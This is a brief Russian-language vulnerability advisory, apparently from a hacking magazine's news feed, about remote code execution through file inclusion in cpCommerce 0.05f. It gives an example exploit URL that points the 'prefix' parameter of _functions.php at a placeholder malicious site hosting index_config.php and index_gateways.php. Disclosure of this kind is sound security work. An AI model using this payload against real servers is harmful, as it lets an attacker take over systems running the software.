Удаленное выполнение произвольного кода в cpCommerce

Программа: cpCommerce 0.05f

Уязвимость обнаружена в cpCommerce. Удаленный пользователь может скомпрометировать удаленную систему.

Пример/Эксплоит:

http://[victim]/[path_of_cpcommerce]/_functions.php? prefix=http://[malicious_site]/index

где

http://[malicious_site]/index_config.php и "http://[malicious_site]/index_gateways.php.

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.